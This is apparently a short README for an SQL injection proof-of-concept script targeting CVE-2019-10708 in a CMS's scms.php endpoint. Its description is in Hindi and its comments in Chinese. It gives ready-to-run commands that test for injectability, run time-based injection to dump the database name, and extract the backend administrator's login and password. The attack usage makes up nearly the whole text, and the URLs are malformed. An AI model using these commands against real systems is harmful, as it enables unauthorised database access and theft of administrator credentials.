
CVE-2019-10708 SQL injection PoC
exploit.py CVE-2019-10708 भेद्यता के लिए PoC है, जो मल्टीप्रोसेसिंग के माध्यम से इंजेक्शन करता है और डेटाबेस नाम तथा बैकएंड एडमिन के उपयोगकर्ता नाम और पासवर्ड प्राप्त करता है (अनुशंसित संस्करण 20190401 से पहले का है)।
# 測試是否可注入
python3 exploit.py http:localhost/js/scms.php --test
# sleep時間為60秒與取得資料庫
python3 exploit.py http:localhost/js/scms.php -s 60 --db
# 取得A_login與A_pwd
python3 exploit.py http:localhost/js/scms.php --login --pwd